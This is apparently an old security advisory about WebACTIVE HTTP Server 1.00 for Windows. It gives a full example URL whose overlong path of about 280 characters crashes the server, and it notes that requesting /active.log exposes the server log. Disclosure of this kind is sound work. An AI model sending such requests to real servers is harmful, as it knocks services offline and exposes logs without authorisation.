Vulnerability

    Webactiv.exe

Affected

    ITAfrica's WebACTIVE version 1.00

Description

    Prizm  found  following.   He  was  looking  for a small server to
    download recently to show one of his friends something he had made
    and  later  he  messed  about  with  this little program a bit and
    noticed some DoS bug.

    WEBactive HTTP  Server 1.00  is an  HTTP/1.00-compliant World Wide
    Web  server  daemon  for  Windows  95  or Windows NT, specifically
    designed for the  SOHO (Small Office/Home)  environment.  It  will
    operate  on  any  TCP/IP  connection  to the Internet, whether via
    temporary dial-up or permanent leased-line connectivity.

    The  problem  is  with  bounds  checking,  when  you  request  280
    characters Webactiv.exe just shuts down.  Quick example:

        http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

    *Also* by simply requesting /active.log you can view the webserver
    log,  because  active.log  is  the  default  logfile  name and the
    default directory is where that file is stored.

Solution

    Heh, this server was discontinued as far as I see... it is  rather
    dated and doesn't support much.  Seeing as it was last revised  in
    1996, contacting the vendor  would be rather meaningless...   Also
    the fact  that it  is HTTP/1.00-compliant  kind of  hints it is no
    longer being updated.